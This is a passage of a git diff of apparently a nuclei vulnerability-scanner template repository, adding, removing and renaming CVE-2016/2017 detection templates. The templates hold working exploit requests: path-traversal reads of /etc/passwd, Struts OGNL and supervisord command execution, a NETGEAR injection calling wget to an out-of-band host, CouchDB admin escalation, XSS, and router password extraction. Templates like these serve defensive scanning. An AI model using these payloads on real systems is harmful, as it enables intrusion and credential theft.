HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200' - - 'contains(body_2, "[zm_gallery id=")' - - 'contains(body_2, "")' - - '!contains(body_3, "")' - condition: and -# digest: 490a004630440220699b403999a44dfa1c0a95c442149578cb0dba8769c29aff63008cc829004d2202201090107521d760927c5f1134bbceda7facb495a7c6291a6a0669d3ca7a6832ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/cve-2016-10956.yaml b/nuclei-templates/CVE-2016/cve-2016-10956.yaml deleted file mode 100644 index 0d3a7bd668..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-10956.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2016-10956 - -info: - name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) - author: daffainfo,0x240x23elu - severity: high - description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. - reference: - - https://cxsecurity.com/issue/WLB-2016080220 - - https://wpvulndb.com/vulnerabilities/8609 - tags: cve,cve2016,wordpress,wp-plugin,lfi,mail - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2016-10956 - cwe-id: CWE-20 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1555.yaml b/nuclei-templates/CVE-2016/cve-2016-1555.yaml new file mode 100644 index 0000000000..b90433e242 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1555.yaml @@ -0,0 +1,47 @@ +id: CVE-2016-1555 + +info: + name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection + author: gy741 + severity: critical + description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. + reference: + - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 + - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic + - http://seclists.org/fulldisclosure/2016/Feb/112 + - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-1555 + cwe-id: CWE-77 + epss-score: 0.97373 + epss-percentile: 0.99898 + cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netgear + product: wnap320_firmware + tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev + +http: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" +# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/cve-2016-2389.yaml b/nuclei-templates/CVE-2016/cve-2016-2389.yaml new file mode 100644 index 0000000000..364e21e9ba --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-2389.yaml @@ -0,0 +1,32 @@ +id: CVE-2016-2389 + +info: + name: SAP xMII 15.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978. + reference: + - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ + - https://www.cvedetails.com/cve/CVE-2016-2389 + tags: cve,cve2016,lfi,sap + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-2389 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-3081.yaml b/nuclei-templates/CVE-2016/cve-2016-3081.yaml new file mode 100644 index 0000000000..86662795dc --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-3081.yaml @@ -0,0 +1,32 @@ +id: CVE-2016-3081 + +info: + name: Apache S2-032 Struts RCE + author: dhiyaneshDK + severity: high + description: | + Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. + reference: + - https://cwiki.apache.org/confluence/display/WW/S2-032 + - https://struts.apache.org/docs/s2-032.html + tags: cve,cve2016,struts,rce,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2016-3081 + cwe-id: CWE-77 + +requests: + - raw: + - | + GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2016/cve-2016-4975.yaml b/nuclei-templates/CVE-2016/cve-2016-4975.yaml deleted file mode 100644 index f94762b21e..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-4975.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CVE-2016-4975 - -info: - name: Apache mod_userdir CRLF injection - author: melbadry9,nadino,xElkomy,sullo - severity: low - description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. - tags: crlf,generic,cves,cve2016,apache - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-4975 - cwe-id: CWE-93 - -requests: - - method: GET - path: - - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" - - matchers: - - type: regex - regex: - - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - part: header diff --git a/nuclei-templates/CVE-2016/cve-2016-4977.yaml b/nuclei-templates/CVE-2016/cve-2016-4977.yaml deleted file mode 100644 index af1c7246b2..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-4977.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2016-4977 - -info: - name: Spring Security OAuth2 Remote Command Execution - author: princechaddha - severity: high - description: When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type. - reference: - - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md - - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 - tags: cve,cve2016,spring,oauth2,oauth,rce,ssti - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2016-4977 - cwe-id: CWE-19 - -requests: - - method: GET - path: - - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Unsupported response types: [978015547]" - - - type: status - status: - - 400 diff --git a/nuclei-templates/CVE-2016/cve-2016-5649.yaml b/nuclei-templates/CVE-2016/cve-2016-5649.yaml new file mode 100644 index 0000000000..40868caf7e --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-5649.yaml @@ -0,0 +1,40 @@ +id: CVE-2016-5649 + +info: + name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure + author: suman_kar + severity: critical + description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. + tags: cve,cve2016,iot,netgear,router + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-5649 + cwe-id: CWE-200 + +requests: + - raw: + - | + GET /BSW_cxttongr.htm HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Smart Wizard Result " + part: body + + extractors: + - type: regex + name: password + part: body + group: 1 + regex: + - 'Success "([a-z]+)"' diff --git a/nuclei-templates/CVE-2016/cve-2016-6210.yaml b/nuclei-templates/CVE-2016/cve-2016-6210.yaml new file mode 100644 index 0000000000..86c405ed7a --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-6210.yaml @@ -0,0 +1,33 @@ +id: CVE-2016-6210 + +info: + name: OpenSSH username enumeration < v7.3 + author: iamthefrogy,forgedhallpass + severity: medium + tags: network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. + reference: + - http://seclists.org/fulldisclosure/2016/Jul/51 + - https://security-tracker.debian.org/tracker/CVE-2016-6210 + - http://openwall.com/lists/oss-security/2016/08/01/2 + - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 + cve-id: CVE-2016-6210 + cwe-id: CWE-200 + +network: + - host: + - "{{Hostname}}" + - "{{Host}}:22" + + matchers: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + + extractors: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/cve-2016-7552.yaml b/nuclei-templates/CVE-2016/cve-2016-7552.yaml new file mode 100644 index 0000000000..d5cbdd06b5 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-7552.yaml @@ -0,0 +1,30 @@ +id: CVE-2016-7552 + +info: + name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal + author: dwisiswant0 + severity: critical + description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. + reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 + tags: cve,cve2016,lfi,auth,bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-7552 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/logoff.cgi" + headers: + Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Memory map" + part: body diff --git a/nuclei-templates/CVE-2016/cve-2016-7981.yaml b/nuclei-templates/CVE-2016/cve-2016-7981.yaml deleted file mode 100644 index a15b21c00b..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-7981.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2016-7981 - -info: - name: SPIP 3.1.2 XSS - author: pikpikcu - severity: medium - description: | - Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 - tags: cve,cve2016,xss,spip - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2016-7981 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '">' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml index c91556d3c0..c1eb936feb 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml @@ -2,40 +2,28 @@ id: CVE-2017-1000028 info: name: GlassFish LFI - author: pikpikcu,daffainfo + author: pikpikcu severity: high description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. - reference: - - https://www.exploit-db.com/exploits/45196 - - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 - - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 - - https://www.exploit-db.com/exploits/45196/ + reference: https://www.exploit-db.com/exploits/45196 + tags: cve,cve2017,oracle,glassfish,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2017-1000028 cwe-id: CWE-22 - tags: cve,cve2017,oracle,glassfish,lfi requests: - method: GET path: - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" - - stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and + - type: word + words: + - "/sbin/nologin" + part: body - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml deleted file mode 100644 index de88a3a80b..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2017-1000029 - -info: - name: GlassFish Server Open Source Edition 3.0.1 - LFI - author: 0x_Akoko - severity: high - description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication. - reference: - - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 - - https://www.cvedetails.com/cve/CVE-2017-1000029 - - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-1000029 - cwe-id: CWE-200 - tags: cve,cve2017,glassfish,oracle,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/resource/file%3a///etc/passwd/" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000170.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000170.yaml new file mode 100644 index 0000000000..1ef12d6aae --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-1000170.yaml @@ -0,0 +1,34 @@ +id: CVE-2017-1000170 + +info: + name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal + author: dwisiswant0 + severity: high + description: jqueryFileTree 2.1.5 and older Directory Traversal + reference: + - https://www.exploit-db.com/exploits/49693 + - https://github.com/jqueryfiletree/jqueryfiletree/issues/66 + - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-1000170 + cwe-id: CWE-22 + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and + matchers: + - type: word + words: + - "
  • " + - "passwd
    • " + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-10974.yaml b/nuclei-templates/CVE-2017/CVE-2017-10974.yaml deleted file mode 100644 index 7b1821919c..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-10974.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2017-10974 - -info: - name: Yaws 1.91 - Remote File Disclosure - author: 0x_Akoko - severity: high - description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080 - reference: - - https://www.exploit-db.com/exploits/42303 - - https://nvd.nist.gov/vuln/detail/CVE-2017-10974 - - https://www.exploit-db.com/exploits/42303/ - - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-10974 - cwe-id: CWE-22 - tags: cve,cve2017,yaws,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/%5C../ssl/yaws-key.pem" - - matchers-condition: and - matchers: - - type: word - words: - - "BEGIN RSA PRIVATE KEY" - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(tolower(body), " + supervisor.supervisord.options.warnings.linecache.os.system + + + nslookup {{interactsh-url}} + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: header + words: + - "text/xml" + + - type: word + part: body + words: + - "" + - "" + condition: and diff --git a/nuclei-templates/CVE-2017/CVE-2017-12544.yaml b/nuclei-templates/CVE-2017/CVE-2017-12544.yaml new file mode 100644 index 0000000000..36efd6b1d9 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-12544.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-12544 + +info: + name: HPE System Management - XSS + author: divya_mudgal + severity: medium + description: Reflected Cross-site scripting (XSS) on HPE System Management + reference: + - https://seclists.org/fulldisclosure/2018/Mar/5 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us + - http://www.securitytracker.com/id/1039437 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2017-12544 + cwe-id: CWE-79 + tags: cve,cve2017,xss,hp + +requests: + - method: GET + path: + - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//" + + matchers-condition: and + matchers: + - type: word + words: + - "var prodName = '';prompt`document.domain`;//';" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-12583.yaml b/nuclei-templates/CVE-2017/CVE-2017-12583.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12583.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12583.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12611.yaml b/nuclei-templates/CVE-2017/CVE-2017-12611.yaml deleted file mode 100644 index 39a22529cf..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-12611.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2017-12611 - -info: - name: Apache Struts2 S2-053 - Remote Code Execution - author: pikpikcu - severity: critical - description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks. - reference: - - https://struts.apache.org/docs/s2-053.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-12611 - - https://kb.netapp.com/support/s/article/ka51A000000CgttQAC/NTAP-20170911-0001 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2017-12611 - cwe-id: CWE-20 - tags: cve,cve2017,apache,rce,struts - -requests: - - method: POST - path: - - "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/11 diff --git a/nuclei-templates/CVE-2017/CVE-2017-12635.yaml b/nuclei-templates/CVE-2017/CVE-2017-12635.yaml deleted file mode 100644 index 2999c299a2..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-12635.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2017-12635 - -info: - name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation - author: pikpikcu - severity: critical - description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12635 - - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E - - http://www.securityfocus.com/bid/101868 - - https://security.gentoo.org/glsa/201711-16 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2017-12635 - cwe-id: CWE-269 - tags: cve,cve2017,couchdb,apache - -requests: - - raw: - - | - PUT /_users/org.couchdb.user:poc HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - - { - "type": "user", - "name": "poc", - "roles": ["_admin"], - "roles": [], - "password": "123456" - } - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "application/json" - - "Location:" - - - type: word - part: body - words: - - "org.couchdb.user:poc" - - "conflict" - - "Document update conflict" - - - type: status - status: - - 201 - - 409 - -# Enhanced by mp on 2022/05/11 diff --git a/nuclei-templates/CVE-2017/CVE-2017-12637.yaml b/nuclei-templates/CVE-2017/CVE-2017-12637.yaml deleted file mode 100644 index 572bcf7a8c..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-12637.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2017-12637 - -info: - name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5 - author: apt-mirror - severity: high - description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. - reference: - - https://www.cvedetails.com/cve/CVE-2017-12637/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf - - http://www.sh0w.top/index.php/archives/7/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-12637 - cwe-id: CWE-22 - tags: cve,cve2017,sap,lfi,java,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.." - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "WEB-INF" - - "META-INF" - condition: and - part: body diff --git a/nuclei-templates/CVE-2017/CVE-2017-12794.yaml b/nuclei-templates/CVE-2017/CVE-2017-12794.yaml deleted file mode 100644 index 02b2f66ae2..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-12794.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2017-12794 - -info: - name: Django Debug Page - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). - reference: - - https://twitter.com/sec715/status/1406779605055270914 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - - http://www.securitytracker.com/id/1039264 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-12794 - cwe-id: CWE-79 - tags: xss,django,cve,cve2017 - -requests: - - method: GET - path: - - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-14524.yaml b/nuclei-templates/CVE-2017/CVE-2017-14524.yaml deleted file mode 100644 index e87149510b..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-14524.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2017-14524 -info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect - author: 0x_Akoko - severity: low - description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. - reference: - - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://www.cvedetails.com/cve/CVE-2017-14524 - - https://vuldb.com/?id.107201 - tags: cve,cve2017,redirect,opentext - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - 